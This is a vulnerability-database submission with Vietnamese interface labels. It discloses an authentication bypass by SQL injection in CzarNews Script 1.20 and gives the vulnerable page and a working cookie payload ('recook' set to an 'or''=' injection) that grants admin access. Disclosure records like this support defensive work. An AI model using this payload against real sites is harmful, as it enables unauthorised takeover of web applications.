| tiêu đề | CzarNews Script – Authentication Bypass |
|---|
| Mô tả | Introduction
Exploit Title: CzarNews Script – Authentication Bypass
Version: 1.20
Date: 28.01.2017
Vendor Homepage: http://www.czaries.net
Software Download: http://www.czaries.net/scripts/czarnews.php
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
CzarNwes is a news script that provides powerful news manager on your website. It uses the fastest MySql database system that allows quick changes with posting and comment. Users are allowed unlimitedly under some conditoins to access your own database. News can be posted easily and quickly and it supports HTML and other formatting styles. A highly effective admin panel allows you to do everything on your website. Password retrieval system helps you when the password is forgotten. Installation takes less than a minute and it requires php 4.x and MySql database.
Vulnerable Url:
http://locahost/czarnews/cn_users.php
Set new cookie:
Name : recook
Value : admin%2C'or''='
and refresh the page. |
|---|
| Người dùng | KAAN KAMIS (UID 213) |
|---|
| Đệ trình | 29/01/2017 15:50 (cách đây 9 những năm) |
|---|
| Kiểm duyệt | 30/01/2017 15:49 (24 hours later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 96259 [CzarNews Script 1.20 Cookie /czarnews/cn_users.php recook Tiêm SQL] |
|---|
| điểm | 17 |
|---|